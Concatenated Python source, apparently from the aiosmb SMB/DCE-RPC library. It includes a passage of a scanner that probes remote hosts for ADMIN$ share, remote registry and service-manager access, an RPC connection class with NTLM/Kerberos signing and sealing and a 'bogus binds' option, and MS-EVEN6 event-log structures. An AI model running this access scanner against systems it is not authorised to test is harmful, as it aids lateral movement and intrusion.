					fullpath = '\\\\%s\\%s' % (connection.target.get_hostname_or_ip(), 'ADMIN$')
				)
				_, err = await share.connect(connection)
				if err is not None:
					share_access = False
					share = SMBShare(
						name = 'admin$',
						fullpath = '\\\\%s\\%s' % (connection.target.get_hostname_or_ip(), 'admin$')
					)
					_, err = await share.connect(connection)
					share_access = True if err is None else False
				else:
					share_access = True

				rrp, err = await RRPRPC.from_smbconnection(connection)
				#_, err = await rrp.connect()
				registry_access = True if err is None else False


				srvmgr, err = await REMSVCRPC.from_smbconnection(connection)
				#_, err = await srvmgr.connect()
				service_access = True if err is None else False
				

				await out_queue.put(ScannerData(target, SMBAdminRes(share_access, service_access, registry_access)))
				
		except Exception as e:
			await out_queue.put(ScannerError(target, e))



import asyncio
import traceback

from aiosmb.dcerpc.v5.ndr import NDRCALL
from aiosmb.dcerpc.v5.transport.tcp import DCERPCTCPTransport
from aiosmb.dcerpc.v5.transport.smb import DCERPCSMBTransport
from aiosmb.dcerpc.v5.structure import unpack
from aiosmb.dcerpc.v5.uuid import uuidtup_to_bin, generate, stringver_to_bin, bin_to_uuidtup
from aiosmb.dcerpc.v5.rpcrt import *
from aiosmb.dcerpc.v5 import hresult_errors
from unicrypto.symmetric import RC4
from asyauth.common.winapi.constants import ISC_REQ
import sys


class DCERPC5Connection:
	def __init__(self, gssapi, target):
		self.target = target
		self.gssapi = gssapi

		self.transport = None
		
		if gssapi is None:
			self.auth_type = RPC_C_AUTHN_NONE
		else:
			self.auth_type = RPC_C_AUTHN_WINNT
			if self.gssapi.kerberos is not None:
				self.auth_type = RPC_C_AUTHN_GSS_NEGOTIATE
		
		self.auth_level = RPC_C_AUTHN_LEVEL_NONE
		self.ctx = 0
		self.callid = 1

		self.NDRSyntax   = uuidtup_to_bin(('8a885d04-1ceb-11c9-9fe8-08002b104860', '2.0'))
		self.NDR64Syntax = uuidtup_to_bin(('71710533-BEBA-4937-8319-B5DBEF9CCC36', '1.0'))
		self.transfer_syntax =  self.NDRSyntax

		self.transfer_syntax = uuidtup_to_bin(('8a885d04-1ceb-11c9-9fe8-08002b104860', '2.0'))
		self.__max_xmit_size = 0
		self._max_user_frag = 0

		self.__sequence = 0
		self.__sessionKey = None
		self.__clientSigningKey = None
		self.__serverSigningKey = None
		self.__clientSealingKey = None
		self.__serverSealingKey = None
		self.__clientSealingHandle = None
		self.__serverSealingHandle = None

	def get_session_key(self):
		return self.__sessionKey

	def set_auth_level(self, auth_level):
		self.auth_level = auth_level

	def set_auth_type(self, auth_type):
		self.auth_type = auth_type

	async def disconnect(self):
		try:
			if self.transport is not None:
				await self.transport.disconnect()

			return True, None
		except Exception as e:
			return None, e

	async def connect(self):
		"""
		Selects the correct transport layer based on the self.target and starts it
		"""
		try:
			if self.target.rpcprotocol == 'ncacn_ip_tcp':
				self.transport = DCERPCTCPTransport(self.target)
				await self.transport.connect()

			elif self.target.rpcprotocol == 'ncacn_np':
				self.transport = DCERPCSMBTransport(self.target)
				_, err = await self.transport.connect()
				if err is not None:
					raise err
				self.__sessionKey = self.transport.get_session_key()
			else:
				raise NotImplementedError()

			return True, None
		except Exception as e:
			return None, e

	async def bind(self, iface_uuid, alter = 0, bogus_binds = 0, transfer_syntax = ('8a885d04-1ceb-11c9-9fe8-08002b104860', '2.0')):
		"""
		Performs bind operation. Does authentication and sets up the keys for further communication
		"""
		try:
			bind = MSRPCBind()
			#item['TransferSyntax']['Version'] = 1
			ctx = self.ctx
			for _ in range(bogus_binds):
				item = CtxItem()
				item['ContextID'] = ctx
				item['TransItems'] = 1
				item['ContextID'] = ctx
				# We generate random UUIDs for bogus binds
				item['AbstractSyntax'] = generate() + stringver_to_bin('2.0')
				item['TransferSyntax'] = uuidtup_to_bin(transfer_syntax)
				bind.addCtxItem(item)
				self.ctx += 1
				ctx += 1

			# The true one :)
			item = CtxItem()
			item['AbstractSyntax'] = iface_uuid
			item['TransferSyntax'] = uuidtup_to_bin(transfer_syntax)
			item['ContextID'] = ctx
			item['TransItems'] = 1
			bind.addCtxItem(item)

			packet = MSRPCHeader()
			packet['type'] = MSRPC_BIND
			packet['pduData'] = bind.getData()
			packet['call_id'] = self.callid
			
			if alter:
				packet['type'] = MSRPC_ALTERCTX

			if self.auth_level != RPC_C_AUTHN_LEVEL_NONE:
				#authentication required
				if self.auth_type == RPC_C_AUTHN_WINNT:
					
					#seal flag MUST be turned on in the handshake flags!!!!!!!
					#it is "signaled via the is_rpc variable"0
					auth, res, err = await self.gssapi.ntlm.authenticate(
						None, 
						spn=self.target.to_target_string(),
						flags =  ISC_REQ.REPLAY_DETECT |\
									ISC_REQ.CONFIDENTIALITY|\
									ISC_REQ.USE_SESSION_KEY|\
									ISC_REQ.INTEGRITY|\
									ISC_REQ.SEQUENCE_DETECT|\
									ISC_REQ.CONNECTION
					)
					if err is not None:
						return None, err

				elif self.auth_type == RPC_C_AUTHN_NETLOGON:
					return False, Exception('RPC_C_AUTHN_NETLOGON Not implemented!')

				elif self.auth_type == RPC_C_AUTHN_GSS_NEGOTIATE:
					auth, res, err  = await self.gssapi.gssapi.authenticate(
						None, 
						flags = ISC_REQ.CONFIDENTIALITY |\
								ISC_REQ.INTEGRITY | \
								ISC_REQ.SEQUENCE_DETECT | \
								ISC_REQ.REPLAY_DETECT | \
								ISC_REQ.MUTUAL_AUTH | \
								ISC_REQ.USE_DCE_STYLE,
						#seq_number = 0, 
						spn=self.target.to_target_string()
					)
					if err is not None:
						return None, err
				else:
					return None, Exception('Unsupported auth type!')

				sec_trailer = SEC_TRAILER()
				sec_trailer['auth_type']   = self.auth_type
				sec_trailer['auth_level']  = self.auth_level
				sec_trailer['auth_ctx_id'] = self.ctx + 79231 

				pad = (4 - (len(packet.get_packet()) % 4)) % 4
				if pad != 0:
					packet['pduData'] += b'\xFF'*pad
					sec_trailer['auth_pad_len']=pad

				packet['sec_trailer'] = sec_trailer
				packet['auth_data'] = auth

			_, err = await self.transport.send(packet.get_packet())
			if err is not None:
				raise err
			
			data, err = await self.recv_one()
			if err is not None:
				raise err
			
			resp = MSRPCHeader(data)

			if resp['type'] == MSRPC_BINDACK or resp['type'] == MSRPC_ALTERCTX_R:
				bindResp = MSRPCBindAck(resp.getData())
			elif resp['type'] == MSRPC_BINDNAK or resp['type'] == MSRPC_FAULT:
				if resp['type'] == MSRPC_FAULT:
					resp = MSRPCRespHeader(resp.getData())
					status_code = unpack('<L', resp['pduData'][:4])[0]
				else:
					resp = MSRPCBindNak(resp['pduData'])
					status_code = resp['RejectedReason']
				if status_code in rpc_status_codes:
					return False, DCERPCException(error_code = status_code)
				elif status_code in rpc_provider_reason:
					return False, DCERPCException("Bind context rejected: %s" % rpc_provider_reason[status_code])
				else:
					return False, DCERPCException('Unknown DCE RPC fault status code: %.8x' % status_code)
			else:
				return False, DCERPCException('Unknown DCE RPC packet type received: %d' % resp['type'])

			# check ack results for each context, except for the bogus ones
			for ctx in range(bogus_binds+1,bindResp['ctx_num']+1):
				ctxItems = bindResp.getCtxItem(ctx)
				if ctxItems['Result'] != 0:
					msg = "Bind context %d rejected: " % ctx
					msg += rpc_cont_def_result.get(ctxItems['Result'], 'Unknown DCE RPC context result code: %.4x' % ctxItems['Result'])
					msg += "; "
					reason = bindResp.getCtxItem(ctx)['Reason']
					msg += rpc_provider_reason.get(reason, 'Unknown reason code: %.4x' % reason)
					if (ctxItems['Result'], reason) == (2, 1): # provider_rejection, abstract syntax not supported
						msg += " (this usually means the interface isn't listening on the given endpoint)"
					raise DCERPCException(msg)

				# Save the transfer syntax for later use
				self.transfer_syntax = ctxItems['TransferSyntax']

			# The received transmit size becomes the client's receive size, and the received receive size becomes the client's transmit size.
			self.__max_xmit_size = bindResp['max_rfrag']

			if self.auth_level != RPC_C_AUTHN_LEVEL_NONE:
				if self.auth_type == RPC_C_AUTHN_WINNT:
					response, res, err = await self.gssapi.ntlm.authenticate(
						bindResp['auth_data'], 
						spn=self.target.to_target_string(),
						flags =  ISC_REQ.REPLAY_DETECT |\
									ISC_REQ.CONFIDENTIALITY|\
									ISC_REQ.USE_SESSION_KEY|\
									ISC_REQ.INTEGRITY|\
									ISC_REQ.SEQUENCE_DETECT|\
									ISC_REQ.CONNECTION
					)
					if err is not None:
						return None, err
					
					self.__sessionKey = self.gssapi.ntlm.get_session_key()

				elif self.auth_type == RPC_C_AUTHN_NETLOGON:
					response = None
				elif self.auth_type == RPC_C_AUTHN_GSS_NEGOTIATE:
					response, res, err  = await self.gssapi.gssapi.authenticate(
						bindResp['auth_data'],
						flags = 
							ISC_REQ.CONFIDENTIALITY |\
							ISC_REQ.INTEGRITY | \
							ISC_REQ.SEQUENCE_DETECT | \
							ISC_REQ.REPLAY_DETECT | \
							ISC_REQ.MUTUAL_AUTH | \
							ISC_REQ.USE_DCE_STYLE,
						spn=self.target.to_target_string()
					)
					if err is not None:
						return None, err
					
					self.__sessionKey = self.gssapi.gssapi.get_session_key()

				self.__sequence = 0

				if self.auth_level in (RPC_C_AUTHN_LEVEL_CONNECT, RPC_C_AUTHN_LEVEL_PKT_INTEGRITY, RPC_C_AUTHN_LEVEL_PKT_PRIVACY):
					if self.auth_type == RPC_C_AUTHN_WINNT:
						if self.gssapi.ntlm.is_extended_security() == True:
							self.__clientSigningKey = self.gssapi.ntlm.get_signkey() 
							self.__serverSigningKey = self.gssapi.ntlm.get_signkey('Server')
							self.__clientSealingKey = self.gssapi.ntlm.get_sealkey() 
							self.__serverSealingKey = self.gssapi.ntlm.get_sealkey('Server')
							cipher3 = RC4(self.__clientSealingKey)
							self.__clientSealingHandle = cipher3.encrypt
							cipher4 = RC4(self.__serverSealingKey)
							self.__serverSealingHandle = cipher4.encrypt
							
						else:
							# Same key for everything
							self.__clientSigningKey = self.gssapi.ntlm.get_session_key()
							self.__serverSigningKey = self.gssapi.ntlm.get_session_key()
							self.__clientSealingKey = self.gssapi.ntlm.get_session_key()
							self.__serverSealingKey = self.gssapi.ntlm.get_session_key()
							cipher = RC4(self.__clientSigningKey)
							self.__clientSealingHandle = cipher.encrypt
							self.__serverSealingHandle = cipher.encrypt
						
					elif self.auth_type == RPC_C_AUTHN_NETLOGON:
						raise Exception('RPC_C_AUTHN_NETLOGON is not implemented!')

				sec_trailer = SEC_TRAILER()
				sec_trailer['auth_type'] = self.auth_type
				sec_trailer['auth_level'] = self.auth_level
				sec_trailer['auth_ctx_id'] = self.ctx + 79231 

				if response is not None:
					if self.auth_type == RPC_C_AUTHN_GSS_NEGOTIATE:
						alter_ctx = MSRPCHeader()
						alter_ctx['type'] = MSRPC_ALTERCTX
						alter_ctx['pduData'] = bind.getData()
						alter_ctx['sec_trailer'] = sec_trailer
						alter_ctx['auth_data'] = response
						
						_, err = await self.transport.send(alter_ctx.get_packet(), forceWriteAndx = 1)
						if err is not None:
							raise err
						
						self.__sequence = 0
						data, err = await self.recv_one() #recieving the result of alter_context command
						if err is not None:
							raise err

						self.__sequence = self.gssapi.gssapi.get_seq_number()
					else:
						auth3 = MSRPCHeader()
						auth3['type'] = MSRPC_AUTH3
						# pad (4 bytes): Can be set to any arbitrary value when set and MUST be 
						# ignored on receipt. The pad field MUST be immediately followed by a 
						# sec_trailer structure whose layout, location, and alignment are as 
						# specified in section 2.2.2.11
						auth3['pduData'] = b' ' * 4 #SkelSec: I have spent 3 hours to find this bug, that I caused by replacing spaces to tabs :(
						auth3['sec_trailer'] = sec_trailer
						#SkelSec auth3['auth_data'] = response.getData()
						auth3['auth_data'] = response

						# Use the same call_id
						self.callid = resp['call_id']
						auth3['call_id'] = self.callid
						_, err = await self.transport.send(auth3.get_packet(), forceWriteAndx = 1)
						if err is not None:
							raise err

				self.callid += 1
			return resp, None	 # means packet is signed, if verifier is wrong it fails
		
		except Exception as e:
			return False, e

	
	async def request(self, request, uuid=None, checkError=True):
		"""
		Creates a requests then dispateches it to _transport.send for singing/encryption asn sending
		"""
		try:
			if self.transfer_syntax == self.NDR64Syntax:
				request.changeTransferSyntax(self.NDR64Syntax)
				isNDR64 = True
			else:
				isNDR64 = False
			
			_, err = await self.call(request.opnum, request, uuid)
			if err is not None:
				raise err
			
			answer, err = await self.recv()
			if err is not None:
				raise err
			
			__import__(request.__module__)
			module = sys.modules[request.__module__]
			respClass = getattr(module, request.__class__.__name__ + 'Response')

			if answer[-4:] != b'\x00\x00\x00\x00' and checkError is True:
				error_code = unpack('<L', answer[-4:])[0]
				if error_code in rpc_status_codes:
					
					# This is an error we can handle
					exception = DCERPCException(error_code = error_code)
				else:	
					
					sessionErrorClass = getattr(module, 'DCERPCSessionError')
					try:
						# Try to unpack the answer, even if it is an error, it works most of the times
						response =  respClass(answer, isNDR64 = isNDR64)
					except:
						# No luck :(
						exception = sessionErrorClass(error_code = error_code)
					else:
						exception = sessionErrorClass(packet = response, error_code = error_code)
				return None, exception
			else:
				response =  respClass(answer, isNDR64 = isNDR64)
				return response, None
		except Exception as e:
			return None, e


	async def send(self, data):
		try:
			if isinstance(data, MSRPCHeader) is not True:
				# Must be an Impacket, transform to structure
				data = DCERPC_RawCall(data.OP_NUM, data.get_packet())

			try:
				if data['uuid'] != b'':
					data['flags'] |= PFC_OBJECT_UUID
			except:
				# Structure doesn't have uuid
				pass
			data['ctx_id'] = self.ctx
			data['call_id'] = self.callid
			data['alloc_hint'] = len(data['pduData'])
			# We should fragment PDUs if:
			# 1) Payload exceeds __max_xmit_size received during BIND response
			# 2) We'e explicitly fragmenting packets with lower values
			should_fragment = False

			# Let's decide what will drive fragmentation for this request
			if self._max_user_frag > 0:
				# User set a frag size, let's compare it with the max transmit size agreed when binding the interface
				fragment_size = min(self._max_user_frag, self.__max_xmit_size)
			else:
				fragment_size = self.__max_xmit_size

			# Sanity check. Fragmentation can't be too low, otherwise sec_trailer won't fit

			if self.auth_level in [RPC_C_AUTHN_LEVEL_PKT_INTEGRITY, RPC_C_AUTHN_LEVEL_PKT_PRIVACY]:
				if fragment_size <= 8:
					# Minimum pdu fragment size is 8, important when doing PKT_INTEGRITY/PRIVACY. We need a minimum size of 8
					# (Kerberos)
					fragment_size = 8

			# ToDo: Better calculate the size needed. Now I'm setting a number that surely is enough for Kerberos and NTLM
			# ToDo: trailers, both for INTEGRITY and PRIVACY. This means we're not truly honoring the user's frag request.
			if len(data['pduData']) + 128 > fragment_size:
				should_fragment = True
				if fragment_size+128 > self.__max_xmit_size:
					fragment_size = self.__max_xmit_size - 128

			if should_fragment:
				packet = data['pduData']
				offset = 0

				while 1:
					toSend = packet[offset:offset+fragment_size]
					if not toSend:
						break
					if offset == 0:
						data['flags'] |= PFC_FIRST_FRAG
					else:
						data['flags'] &= (~PFC_FIRST_FRAG)
					offset += len(toSend)
					if offset >= len(packet):
						data['flags'] |= PFC_LAST_FRAG
					else:
						data['flags'] &= (~PFC_LAST_FRAG)
					data['pduData'] = toSend
					_, err = await self._transport_send(data, forceWriteAndx = 1, forceRecv =data['flags'] & PFC_LAST_FRAG)
					if err is not None:
						raise err

			else:
				_, err = await self._transport_send(data)
				if err is not None:
					raise err
			
			self.callid += 1
			return True, None
		except Exception as e:
			return None, e

	
	async def recv(self):
		try:
			finished = False
			retAnswer = b''
			while not finished:
				# At least give me the MSRPCRespHeader, especially important for 
				# TCP/UDP Transports
				response_data, err = await self.transport.recv(1)
				if err is not None:
					raise err

				response_header = MSRPCRespHeader(response_data)

				off = response_header.get_header_size()
				
				if response_header['type'] == MSRPC_FAULT and response_header['frag_len'] >= off+4:
					status_code = unpack("<L",response_data[off:off+4])[0]
					if status_code in rpc_status_codes:
						raise DCERPCException(rpc_status_codes[status_code])
					elif status_code & 0xffff in rpc_status_codes:
						raise DCERPCException(rpc_status_codes[status_code & 0xffff])
					else:
						if status_code in hresult_errors.ERROR_MESSAGES:
							error_msg_short = hresult_errors.ERROR_MESSAGES[status_code][0]
							error_msg_verbose = hresult_errors.ERROR_MESSAGES[status_code][1]
							raise DCERPCException('%s - %s' % (error_msg_short, error_msg_verbose))
						else:
							raise DCERPCException('Unknown DCE RPC fault status code: %.8x' % status_code)

				if response_header['flags'] & PFC_LAST_FRAG:
					# No need to reassembly DCERPC
					finished = True
				else:
					# Forcing Read Recv, we need more packets!
					forceRecv = 1
				
				answer = response_data[off:]
				auth_len = response_header['auth_len']
				if auth_len:
					auth_len += 8
					auth_data = answer[-auth_len:]
					sec_trailer = SEC_TRAILER(data = auth_data)
					answer = answer[:-auth_len]
					
					if sec_trailer['auth_level'] == RPC_C_AUTHN_LEVEL_PKT_PRIVACY:
						if self.auth_type == RPC_C_AUTHN_WINNT:
							if self.gssapi.ntlm.is_extended_security() == True:
								# TODO: FIX THIS, it's not calculating the signature well
								# Since I'm not testing it we don't care... yet
								answer, signature = self.gssapi.ntlm.SEAL(
															self.__serverSigningKey,
															self.__serverSealingKey,
															answer,
															answer,
															self.__sequence,
															self.__serverSealingHandle
														)

							else:
								answer, signature = self.gssapi.ntlm.SEAL(
															self.__serverSigningKey,
															self.__serverSealingKey,
															answer,
															answer,
															self.__sequence,
															self.__serverSealingHandle
														)

								self.__sequence += 1
						elif self.auth_type == RPC_C_AUTHN_NETLOGON:
							raise Exception('RPC_C_AUTHN_NETLOGON is not implemented!')
							#from impacket.dcerpc.v5 import nrpc
							#answer, cfounder = nrpc.UNSEAL(answer, 
							#	   auth_data[len(sec_trailer):],
							#	   self.__sessionKey, 
							#	   False)
							#self.__sequence += 1
						elif self.auth_type == RPC_C_AUTHN_GSS_NEGOTIATE:
							if self.__sequence > 0:
								answer, cfounder = await self.gssapi.gssapi.decrypt(answer, self.__sequence, direction='init', auth_data=auth_data)
					elif sec_trailer['auth_level'] == RPC_C_AUTHN_LEVEL_PKT_INTEGRITY:
						if self.auth_type == RPC_C_AUTHN_WINNT:
							ntlmssp = auth_data[12:]
							
							if self.gssapi.ntlm.is_extended_security() == True:
								#TODO:
								signature =  self.gssapi.ntlm.SIGN(
									self.__serverSigningKey, 
									answer, 
									self.__sequence, 
									self.__serverSealingHandle
								)
							else:
								signature = self.gssapi.ntlm.SIGN(
									self.__serverSigningKey, 
									ntlmssp, 
									self.__sequence, 
									self.__serverSealingHandle
								)
								
								# Yes.. NTLM2 doesn't increment sequence when receiving
								# the packet :P
								self.__sequence += 1
						elif self.auth_type == RPC_C_AUTHN_NETLOGON:
							raise Exception('RPC_C_AUTHN_NETLOGON is not implemented!')
							#from impacket.dcerpc.v5 import nrpc
							#ntlmssp = auth_data[12:]
							#signature = nrpc.SIGN(ntlmssp, 
							#	   self.__confounder, 
							#	   self.__sequence, 
							#	   self.__sessionKey, 
							#	   False)
							#self.__sequence += 1
						elif self.auth_type == RPC_C_AUTHN_GSS_NEGOTIATE:
							# Do NOT increment the sequence number when Signing Kerberos
							#self.__sequence += 1
							pass

					
					if sec_trailer['auth_pad_len']:
						answer = answer[:-sec_trailer['auth_pad_len']]
				
				retAnswer += answer
			
			return retAnswer, None
		except Exception as e:
			return None, e

	
	async def recv_one(self):
		try:
			finished = False
			forceRecv = 0
			retAnswer = b''
			while not finished:
				# At least give me the MSRPCRespHeader, especially important for 
				# TCP/UDP Transports

				response_data, err = await self.transport.recv(1) #test
				if err is not None:
					raise err
				response_header = MSRPCRespHeader(response_data)

				off = response_header.get_header_size()

				if response_header['type'] == MSRPC_FAULT and response_header['frag_len'] >= off+4:
					status_code = unpack("<L",response_data[off:off+4])[0]
					if status_code in rpc_status_codes:
						return None, DCERPCException(rpc_status_codes[status_code])
					elif status_code & 0xffff in rpc_status_codes:
						return None,  DCERPCException(rpc_status_codes[status_code & 0xffff])
					else:
						if status_code in hresult_errors.ERROR_MESSAGES:
							error_msg_short = hresult_errors.ERROR_MESSAGES[status_code][0]
							error_msg_verbose = hresult_errors.ERROR_MESSAGES[status_code][1] 
							return None,  DCERPCException('%s - %s' % (error_msg_short, error_msg_verbose))
						else:
							return None,  DCERPCException('Unknown DCE RPC fault status code: %.8x' % status_code)

				if response_header['flags'] & PFC_LAST_FRAG:
					# No need to reassembly DCERPC
					finished = True
				else:
					# Forcing Read Recv, we need more packets!
					forceRecv = 1
					
			return response_data, None
		except Exception as e:
			return None, e
	
	async def _transport_send(self, rpc_packet, forceWriteAndx = 0, forceRecv = 0):
		"""
		This function does the signing and ecryption on the data we want to send out.
		Keys are set up during bind
		"""
		try:
			rpc_packet['ctx_id'] = self.ctx
			rpc_packet['sec_trailer'] = b''
			rpc_packet['auth_data'] = b''

			if self.auth_level in [RPC_C_AUTHN_LEVEL_PKT_INTEGRITY, RPC_C_AUTHN_LEVEL_PKT_PRIVACY]:
				# Dummy verifier, just for the calculations
				sec_trailer = SEC_TRAILER()
				sec_trailer['auth_type'] = self.auth_type
				sec_trailer['auth_level'] = self.auth_level
				sec_trailer['auth_pad_len'] = 0
				sec_trailer['auth_ctx_id'] = self.ctx + 79231 

				pad = (4 - (len(rpc_packet.get_packet()) % 4)) % 4
				if pad != 0:
					rpc_packet['pduData'] += b'\xBB'*pad
					sec_trailer['auth_pad_len']=pad

				rpc_packet['sec_trailer'] = sec_trailer.getData()
				rpc_packet['auth_data'] = b' '*16

				plain_data = rpc_packet['pduData']
				if self.auth_level == RPC_C_AUTHN_LEVEL_PKT_PRIVACY:
					if self.auth_type == RPC_C_AUTHN_WINNT:
						if self.gssapi.ntlm.is_extended_security() == True:
							sealedMessage, signature = self.gssapi.ntlm.SEAL(
								self.__clientSigningKey, 
								self.__clientSealingKey,
								rpc_packet.get_packet()[:-16],
								plain_data,
								self.__sequence,
								self.__clientSealingHandle
							)
						else:
							sealedMessage, signature = self.gssapi.ntlm.SEAL(
								self.__clientSigningKey, 
								self.__clientSealingKey,
								plain_data,
								plain_data,
								self.__sequence,
								self.__clientSealingHandle
							)
						
					elif self.auth_type == RPC_C_AUTHN_NETLOGON:
						raise Exception('RPC_C_AUTHN_NETLOGON is not implemented!')
						#from impacket.dcerpc.v5 import nrpc
						#sealedMessage, signature = nrpc.SEAL(plain_data, self.__confounder, self.__sequence, self.__sessionKey, False)
					elif self.auth_type == RPC_C_AUTHN_GSS_NEGOTIATE:
						sealedMessage, signature = await self.gssapi.gssapi.encrypt(plain_data, self.__sequence)
					rpc_packet['pduData'] = sealedMessage

				elif self.auth_level == RPC_C_AUTHN_LEVEL_PKT_INTEGRITY: 
					if self.auth_type == RPC_C_AUTHN_WINNT:
						if self.gssapi.ntlm.is_extended_security() == True:
							# Interesting thing.. with NTLM2, what is is signed is the 
							# whole PDU, not just the data
							signature =  self.gssapi.ntlm.SIGN(self.__clientSigningKey, 
								rpc_packet.get_packet()[:-16], 
								self.__sequence, 
								self.__clientSealingHandle)
						else:
							signature =  self.gssapi.ntlm.SIGN(self.__clientSigningKey, 
								plain_data, 
								self.__sequence, 
								self.__clientSealingHandle)
					elif self.auth_type == RPC_C_AUTHN_NETLOGON:
						raise Exception('RPC_C_AUTHN_NETLOGON is not implemented!')
						#from impacket.dcerpc.v5 import nrpc
						#signature = nrpc.SIGN(plain_data, 
						#	   self.__confounder, 
						#	   self.__sequence, 
						#	   self.__sessionKey, 
						#	   False)
					elif self.auth_type == RPC_C_AUTHN_GSS_NEGOTIATE:
						signature = await self.gssapi.gssapi.sign(plain_data, self.__sequence)

				rpc_packet['sec_trailer'] = sec_trailer.getData()
				rpc_packet['auth_data'] = signature

				self.__sequence += 1

			_, err = await self.transport.send(rpc_packet.get_packet(), forceWriteAndx = forceWriteAndx, forceRecv = forceRecv)
			if err is not None:
				raise err
			return True, None
		except Exception as e:
			return None, e

	async def call(self, function, body, uuid=None):
		try:
			if hasattr(body, 'getData'):
				t, err = await self.send(DCERPC_RawCall(function, body.getData(), uuid))
				if err is not None:
					raise err
				return t, None
			else:
				t, err = await self.send(DCERPC_RawCall(function, body, uuid))
				if err is not None:
					raise err
				return t, None
		except Exception as e:
			return None, e

		
	#def alter_ctx(self, newUID, bogus_binds = 0):
	#	answer = self.__class__(self.transport)
	#
	#	answer.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash,
	#						   self.__aesKey, self.__TGT, self.__TGS)
	#	answer.set_auth_type(self.__auth_type)
	#	answer.set_auth_level(self.__auth_level)
	#
	#	answer.set_ctx_id(self.ctx+1)
	#	answer.__callid = self.callid
	#	answer.bind(newUID, alter = 1, bogus_binds = bogus_binds, transfer_syntax = bin_to_uuidtup(self.transfer_syntax))
	#	return answer


# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
# Copyright (c) 2017 @MrAnde7son
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Author: Itamar (@MrAnde7son)
#
# Description:
#   Initial [MS-EVEN6] Interface implementation
#
#   Best way to learn how to use these calls is to grab the protocol standard
#   so you understand what the call does, and then read the test case located
#   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
#
#   Some calls have helper functions, which makes it even easier to use.
#   They are located at the end of this file.
#   Helper functions start with "h"<name of the call>.
#   There are test cases for them too.
#
from aiosmb.dcerpc.v5 import system_errors
from aiosmb.dcerpc.v5.dtypes import WSTR, DWORD, LPWSTR, ULONG, LARGE_INTEGER, WORD, BYTE
from aiosmb.dcerpc.v5.ndr import NDRCALL, NDRPOINTER, NDRUniConformantArray, NDRUniVaryingArray, NDRSTRUCT
from aiosmb.dcerpc.v5.rpcrt import DCERPCException
from aiosmb.dcerpc.v5.uuid import uuidtup_to_bin

MSRPC_UUID_EVEN6 = uuidtup_to_bin(('F6BEAFF7-1E19-4FBB-9F8F-B89E2018337C', '1.0'))

class DCERPCSessionError(DCERPCException):
	def __init__(self, error_string=None, error_code=None, packet=None):
		DCERPCException.__init__(self, error_string, error_code, packet)


################################################################################
# CONSTANTS
################################################################################

# Evt Path Flags
EvtQueryChannelName = 0x00000001
EvtQueryFilePath = 0x00000002
EvtReadOldestToNewest = 0x00000100
EvtReadNewestToOldest = 0x00000200

################################################################################
# STRUCTURES
################################################################################

class CONTEXT_HANDLE_LOG_HANDLE(NDRSTRUCT):
	align = 1
	structure = (
		('Data', '20s=""'),
	)

class PCONTEXT_HANDLE_LOG_HANDLE(NDRPOINTER):
	referent = (
		('Data', CONTEXT_HANDLE_LOG_HANDLE),
	)

class CONTEXT_HANDLE_LOG_QUERY(NDRSTRUCT):
	align = 1
	structure = (
		('Data', '20s=""'),
	)

class PCONTEXT_HANDLE_LOG_QUERY(NDRPOINTER):
	referent = (
		('Data', CONTEXT_HANDLE_LOG_QUERY),
	)

class LPPCONTEXT_HANDLE_LOG_QUERY(NDRPOINTER):
	referent = (
		('Data', PCONTEXT_HANDLE_LOG_QUERY),
	)

class CONTEXT_HANDLE_OPERATION_CONTROL(NDRSTRUCT):
	align = 1
	structure = (
		('Data', '20s=""'),
	)

class PCONTEXT_HANDLE_OPERATION_CONTROL(NDRPOINTER):
	referent = (
		('Data', CONTEXT_HANDLE_OPERATION_CONTROL),
	)

# 2.2.11 EvtRpcQueryChannelInfo
class EvtRpcQueryChannelInfo(NDRSTRUCT):
	structure = (
		('Name', LPWSTR),
		('Status', DWORD),
	)

class EvtRpcQueryChannelInfoArray(NDRUniVaryingArray):
	item = EvtRpcQueryChannelInfo

class LPEvtRpcQueryChannelInfoArray(NDRPOINTER):
	referent = (
		('Data', EvtRpcQueryChannelInfoArray)
	)

class RPC_INFO(NDRSTRUCT):
	structure = (
		('Error', DWORD),
		('SubError', DWORD),
		('SubErrorParam', DWORD),
	)

class PRPC_INFO(NDRPOINTER):
	referent = (
		('Data', RPC_INFO)
	)

class LPWSTR_ARRAY(NDRUniConformantArray):
	item = LPWSTR

class PLPWSTR_ARRAY(NDRPOINTER):
	referent = (
		('Data',LPWSTR_ARRAY),
	)

class WSTR_ARRAY(NDRUniVaryingArray):
	item = WSTR

class DWORD_ARRAY(NDRUniVaryingArray):
	item = DWORD

class LPDWORD_ARRAY(NDRPOINTER):
	referent = (
		('Data', DWORD_ARRAY)
	)

class BYTE_ARRAY(NDRUniVaryingArray):
	item = 'c'

class CBYTE_ARRAY(NDRUniVaryingArray):
	item = BYTE

class CDWORD_ARRAY(NDRUniConformantArray):
	item = DWORD

class LPBYTE_ARRAY(NDRPOINTER):
	referent = (
		('Data', CBYTE_ARRAY)
	)

class ULONG_ARRAY(NDRUniVaryingArray):
	item = ULONG

# 2.3.1 EVENT_DESCRIPTOR
class EVENT_DESCRIPTOR(NDRSTRUCT):
	structure = (
		('Id', WORD),
		('Version', BYTE),
		('Channel', BYTE),
		('LevelSeverity', BYTE),
		('Opcode', BYTE),
		('Task', WORD),
		('Keyword', ULONG),
	)

class BOOKMARK(NDRSTRUCT):
	structure = (
		('BookmarkSize', DWORD),
		('HeaderSize', '<L=0x18'),
		('ChannelSize', DWORD),
		('CurrentChannel', DWORD),
		('ReadDirection', DWORD),
		('RecordIdsOffset', DWORD),
		('LogRecordNumbers', ULONG_ARRAY),
	)


#2.2.17 RESULT_SET
class RESULT_SET(NDRSTRUCT):
	structure = (
		('TotalSize', DWORD),
		('HeaderSize', DWORD),
		('EventOffset', DWORD),
		('BookmarkOffset', DWORD),
		('BinXmlSize', DWORD),
		('EventData', BYTE_ARRAY),
		#('NumberOfSubqueryIDs', '<L=0'),
		#('SubqueryIDs', BYTE_ARRAY),
		#('BookMarkData', BOOKMARK),
	)

################################################################################
# RPC CALLS
################################################################################

class EvtRpcRegisterLogQuery(NDRCALL):
	opnum = 5
	structure = (
		('Path', LPWSTR),
		('Query', WSTR),
		('Flags', DWORD),
	)

class EvtRpcRegisterLogQueryResponse(NDRCALL):
	structure = (
		('Handle', CONTEXT_HANDLE_LOG_QUERY),
		('OpControl', CONTEXT_HANDLE_OPERATION_CONTROL),
		('QueryChannelInfoSize', DWORD),
		('QueryChannelInfo', EvtRpcQueryChannelInfoArray),
